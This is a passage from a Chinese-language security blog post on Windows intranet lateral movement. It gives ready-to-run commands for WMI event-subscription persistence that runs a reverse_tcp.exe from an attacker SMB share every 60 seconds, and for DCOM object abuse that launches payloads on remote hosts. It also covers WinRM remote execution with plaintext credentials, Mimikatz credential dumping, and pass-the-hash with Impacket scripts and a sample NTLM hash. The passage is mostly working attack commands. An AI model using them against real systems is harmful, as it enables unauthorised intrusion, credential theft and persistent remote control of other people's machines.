<p>在远程主机上部署一个随即命名的永久事件订阅，并每隔60s执行以此SMB共享中的攻击载荷</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Sharp-WMIEvent -Trigger Interval -IntervalPeriod 60 -ComputerName 192.168.30.132 -Domain hackme.com -Username Administrator -Password Admin2012 -Command &quot;cmd.exe /c \\IP\evilsmb\reverse_tcp.exe&quot;</span><br></pre></td></tr></table></figure>

<h2 id="DCOM的利用"><a href="#DCOM的利用" class="headerlink" title="DCOM的利用"></a>DCOM的利用</h2><p>COM（Component Object Model，组件对象模型）是微软的一套软件组成的二进制接口标准，使得跨编程语言的进程间通信、动态对象创建成为可能。COM指定了一个对象模型和编程要求，使COM对象能够与其他对象交互。这些对象可以在单个进程中，也可以在其它进程中，甚至可以在远程计算机中。在Windows中，每个COM对象都由唯一的128位的二进制标识符标识，即GUID。</p>
<p>DCOM（Distracted Component Model，分布式组件对象模型）是基于COM的一系列概念和程序接口，支持不同机器上的组件间通信。利用DCOM，客户端程序对象可以请求来自网络中另一台计算机上的服务器程序对象。</p>
<p>部分DCOM组件公开的接口中可能包含不安全的方法。执行以下命令，可以列出计算机上所有的DCOM程序组件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Get-CimInstance Win32_DCOMApplication</span><br></pre></td></tr></table></figure>

<p>目前常利用的DCOM组件有：MMC20.Application、ShellWindows、Excel.Application、ShellBrowserWindow等。</p>
<p>使用DCOM在远程主机上面执行命令，需要具有以下条件：</p>
<ul>
<li>具有管理员权限的PowerShell</li>
<li>可能需要关闭目标系统的防火墙。</li>
<li>在远程主机上执行命令时，必须使用域管的administrator账户或者目标主机具有管理员权限的账户</li>
</ul>
<h3 id="MMC20-Application"><a href="#MMC20-Application" class="headerlink" title="MMC20.Application"></a>MMC20.Application</h3><p><code>MMC20.Application</code>对象的<code>Document.ActiveView</code>下存在一个ExecuteShellCommand方法，可以用来启动子进程并运行执行的程序或系统命令。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">通过progID与DCOM进行远程交互，并创建MMC20.Application对象的示例</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com = [activator]::CreateInstance([<span class="built_in">type</span>]::GetTypeFromProgID(<span class="string">&quot;MMC20.Application&quot;</span>,<span class="string">&quot;192.168.30.100&quot;</span>))</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">调用ExecuteShellCommand方法启动进程，运行攻击载荷</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com.Document.ActiveView.ExecuteShellCommand(<span class="string">&#x27;cmd.exe&#x27;</span>,<span class="variable">$null</span>,<span class="string">&quot;/c \\192.168.207.152\mysmb\reverse_tcp.exe&quot;</span>, <span class="string">&quot;Minimized&quot;</span>)</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">合并一句话</span></span><br><span class="line">[activator]::CreateInstance([type]::GetTypeFromProgID(&quot;MMC20.Application&quot;,&quot;192.168.30.100&quot;)).Document.ActiveView.ExecuteShellCommand(&#x27;cmd.exe&#x27;,$null,&quot;/c \\192.168.207.152\mysmb\reverse_tcp.exe&quot;, &quot;Minimized&quot;)</span><br></pre></td></tr></table></figure>

<h3 id="ShellWindows"><a href="#ShellWindows" class="headerlink" title="ShellWindows"></a>ShellWindows</h3><p><code>ShellWindows</code>组件提供了<code>Document.Application.ShellExecute</code>方法，适用于Windows7及以上的系统。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">通过PowerShell与DCOM进行远程交互，创建ShellWindows对象的实例:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com=[Activator]::CreateInstance([Type]::GetTypeFromCLSID(<span class="string">&#x27;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#x27;</span>,<span class="string">&quot;192.168.30</span></span></span><br><span class="line"></span><br><span class="line">.138&quot;))</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash"><span class="string">然后执行如下命令，我们就可以调用该对象的&quot;</span>ShellExecute<span class="string">&quot;方法在远程主机上启动进程:</span></span></span><br><span class="line"><span class="meta">$</span><span class="language-bash"><span class="string">com.item().Document.Application.ShellExecute(&quot;</span>cmd.exe<span class="string">&quot;,&quot;</span>/c C:\shell.exe<span class="string">&quot;,&quot;</span>c:\windows\system32<span class="string">&quot;,<span class="variable">$null</span>,0)</span></span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash"><span class="string">完整的命令:</span></span></span><br><span class="line">[Activator]::CreateInstance([Type]::GetTypeFromCLSID(&#x27;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#x27;,&quot;192.168.52.138&quot;)).item().Document.Application.ShellExecute(&quot;cmd.exe&quot;,&quot;/c C:\shell.exe&quot;,&quot;c:\windows\system32&quot;,$null,0)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="Excel-Application"><a href="#Excel-Application" class="headerlink" title="Excel.Application"></a>Excel.Application</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">通过PowerShell与DCOM进行远程交互，创建Excel.Application对象的实例:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com = [activator]::CreateInstance([<span class="built_in">type</span>]::GetTypeFromprogID(<span class="string">&quot;Excel.Application&quot;</span>,<span class="string">&quot;192.168.52.138&quot;</span>))</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com.DisplayAlerts = <span class="variable">$false</span></span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">然后执行如下命令，我们就可以调用该对象的<span class="string">&quot;DDEInitiate&quot;</span>方法在远程主机上启动进程:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com.DDEInitiate(<span class="string">&quot;cmd.exe&quot;</span>,<span class="string">&quot;/c C:\shell.exe&quot;</span>)</span></span><br></pre></td></tr></table></figure>

<h3 id="ShellBrowserWindow"><a href="#ShellBrowserWindow" class="headerlink" title="ShellBrowserWindow"></a>ShellBrowserWindow</h3><p>使用条件：适用于Windows 10和Windows Server 2012 R2等版本的系统。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">通过PowerShell与DCOM进行远程交互，创建Excel.Application对象的实例:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com = [activator]::CreateInstance([<span class="built_in">type</span>]::GetTypeFromCLSID(<span class="string">&quot;C08AFD90-F2A1-11D1-8455-00A0C91F3880&quot;</span>,<span class="string">&quot;192.168.52.138&quot;</span>))</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">然后执行如下命令，我们就可以调用该对象的<span class="string">&quot;shellExecute&quot;</span>方法在远程主机上启动进程:</span></span><br><span class="line"><span class="meta">$</span><span class="language-bash">com.Document.Application.shellExecute(<span class="string">&quot;C:\shell.exe&quot;</span>)</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">完整的命令:</span></span><br><span class="line">[activator]::CreateInstance([type]::GetTypeFromCLSID(&quot;C08AFD90-F2A1-11D1-8455-00A0C91F3880&quot;,&quot;192.168.52.138&quot;)).Document.Application.shellExecute(&quot;C:\shell.exe&quot;)</span><br></pre></td></tr></table></figure>


<h3 id="Impacket里的dcomexec-py脚本"><a href="#Impacket里的dcomexec-py脚本" class="headerlink" title="Impacket里的dcomexec.py脚本"></a>Impacket里的dcomexec.py脚本</h3><p>Impacket 里面提供的 dcomexec.py 脚本可以提供一个类似于 wmiexec.py 脚本的半交互式shell，但使用的是DCOM，目前支持<code>MMC20.Application，ShellWindows和ShellBrowserWindow</code>对象。</p>
<p>命令格式如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./dcomexec.py domain/username:password@ip</span><br><span class="line">./dcomexec.py domain/username:password@ip &lt;command&gt;</span><br></pre></td></tr></table></figure>


<h2 id="WinRM的利用"><a href="#WinRM的利用" class="headerlink" title="WinRM的利用"></a>WinRM的利用</h2><p> WinRM是通过执行WS-Management协议（用于远程软件和硬件管理的Web服务协议）来实现远程管理的，允许处于一个共同网络内的Windows计算机彼此之间互相访问和交换信息，对应的端口是5985。在一台计算机启用WinRM服务后，防火墙会自动放行其相关通信端口，在另一台计算机便能通过WinRM对其进行远程管理了。</p>
<p>只有在Windows Server 2008以上版本的服务器中，WinRm服务才会自动启动。</p>
<p>在利用WinRM进行横向移动时，需要拥有远程主机的管理员凭据信息。</p>
<h3 id="通过WinRM执行远程命令"><a href="#通过WinRM执行远程命令" class="headerlink" title="通过WinRM执行远程命令"></a>通过WinRM执行远程命令</h3><p>Windows远程管理提供了两个工具：<br>① Winrs，允许远程执行命令的命令行工具，利用了WS-Manage协议<br>② Winrm（Winrm.cmd)，内置系统管理命令行工具，允许管理员配置本机的WinRM服务。</p>
<p>在默认情况下，无法通过WinRM连接到目标系统。可能出现错误：Winrs error：WinRM客户端无法处理该请求。可以将默认身份验证与IP地址结合使用：<br>① 传输为HTTPS或目标位于TrustedHosts列表中，并且提供显式凭据<br>② 使用Winrm.cmd配置TrustedHosts。</p>
<p>执行以下命令，将目标地址添加到TrustedHosts中：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">winrm set winrm/config/client @&#123;TrustedHosts=&quot;192.168.30.100&quot;&#125;</span><br><span class="line"></span><br><span class="line">set-Item WSMan:localhost\client\trustedhosts -value *    # 通过powershell，信任所有主机</span><br></pre></td></tr></table></figure>


<p><strong>Winrs</strong><br>winrs是Windows上远程管理提供的客户端程序，允许通过提供的用户凭据，在运行WinRM的服务器上执行命令。要求通信双方都安装了WinRM服务。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">执行系统命令</span></span><br><span class="line">winrs -r:http://192.168.30.100:5985 -u:Administrator -p:Admin2012 &quot;whoami&quot;</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">获取远程交互式命令行</span></span><br><span class="line">winrs -r:http://192.168.30.100:5985 -u:Administrator -p:Admin2012 &quot;cmd&quot;</span><br></pre></td></tr></table></figure>

<p><strong>Winrm.cmd</strong><br>winrm.cmd允许WMI对象通过WinRm传输进行远程交互，在本地或远程计算机上枚举WMI对象实例或调用WMI类方法。比如可以通过调用Win32_Process类的Create方法来创建远程实例。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">winrm invoke create wmicimv2/win32_process -SkipCAcheck -skipCNcheck @&#123;commandline=&quot;notepad.exe&quot;&#125; -r:http://192.168.30.100:5985 -u:Administrator -p:Admin2012</span><br></pre></td></tr></table></figure>

<h3 id="Evil-Winrm"><a href="#Evil-Winrm" class="headerlink" title="Evil-Winrm"></a>Evil-Winrm</h3><p><a target="_blank" rel="noopener" href="https://github.com/Hackplayers/evil-winrm">https://github.com/Hackplayers/evil-winrm</a></p>
<h2 id="哈希传递"><a href="#哈希传递" class="headerlink" title="哈希传递"></a>哈希传递</h2><p>哈希传递（Pass The Hash，PTH）是一种针对NTLM协议的攻击技术。在NTLM身份认证的第三步中生成Response时，客户端直接使用用户的NTLM哈希值进行计算，用户的明文密码并不参与整个认证过程。</p>
<p>因此，在测试人员获取了用户名和密码哈希后，就能够使用该信息对远程主机进行身份认证，不需要暴力破解获取明文密码即可获取主机权限。</p>
<h3 id="哈希传递攻击的利用"><a href="#哈希传递攻击的利用" class="headerlink" title="哈希传递攻击的利用"></a>哈希传递攻击的利用</h3><p><strong>利用Mimikatz进行PTH</strong></p>
<p>Mimikatz内置了哈希传递的功能，需要本地管理员权限。</p>
<p>① 抓取用户的哈希</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords full&quot; exit</span><br></pre></td></tr></table></figure>

<p>② 利用抓取的域管理员的NTLM hash进行哈希传递</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::pth /user:Administrator /domain:hackme.com /ntlm:93b95aef15f4d50fab96ffc44a2f326a&quot; exit</span><br></pre></td></tr></table></figure>


<p><strong>利用impacket进行PTH</strong></p>
<p>Impacket项目中具有远程执行功能的几个脚本几乎都可以进行哈希传递攻击，常见的有：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">psexec.py      # 类似PSEXEC的功能示例，使用remcomsvc（https://github.com/kavika13/remcom）</span><br><span class="line">smbexec.py     # 与使用remcomsvc的psexec w/o类似的方法。这里描述了该技术。我们的实现更进一步，实例化本地smbserver以接收命令的输出。这在目标计算机没有可写共享可用的情况下很有用。</span><br><span class="line">atexec.py      # 此示例通过Task Scheduler服务在目标计算机上执行命令，并返回已执行命令的输出。</span><br><span class="line">wmiexec.py     # 通过Windows Management Instrumentation使用的半交互式shell，它不需要在目标服务器上安装任何服务/代理，以管理员身份运行，非常隐蔽。</span><br><span class="line">dcomexec.py    # 类似于wmiexec.py的半交互式shell，但使用不同的DCOM端点。目前支持MMC20.Application，ShellWindows和ShellBrowserWindow对象。</span><br></pre></td></tr></table></figure>

<p>用法：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># </span><span class="language-bash">普通用法</span></span><br><span class="line">python3 xxx.py domain/user:password@ip</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta"># </span><span class="language-bash">哈希传递</span></span><br><span class="line">python3 xxx.py domain/user@ip -hashes :93b95aef15f4d50fab96ffc44a2f326a</span><br></pre></td></tr></table></figure>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2023/04/05/内网渗透/内网横向移动/">http://dar1in9s.github.io/2023/04/05/内网渗透/内网横向移动/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/04/06/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/Kerberos/"><i class="fa fa-chevron-left">  </i><span>内网渗透之kerberos</span></a></div><div class="next-post pull-right"><a href="/2023/04/05/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E6%9D%83%E9%99%90%E6%8C%81%E4%B9%85%E5%8C%96/"><span></span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div class="layout" id="footer"><div class="copyright">&copy;2020 - 2023 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/algolia.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>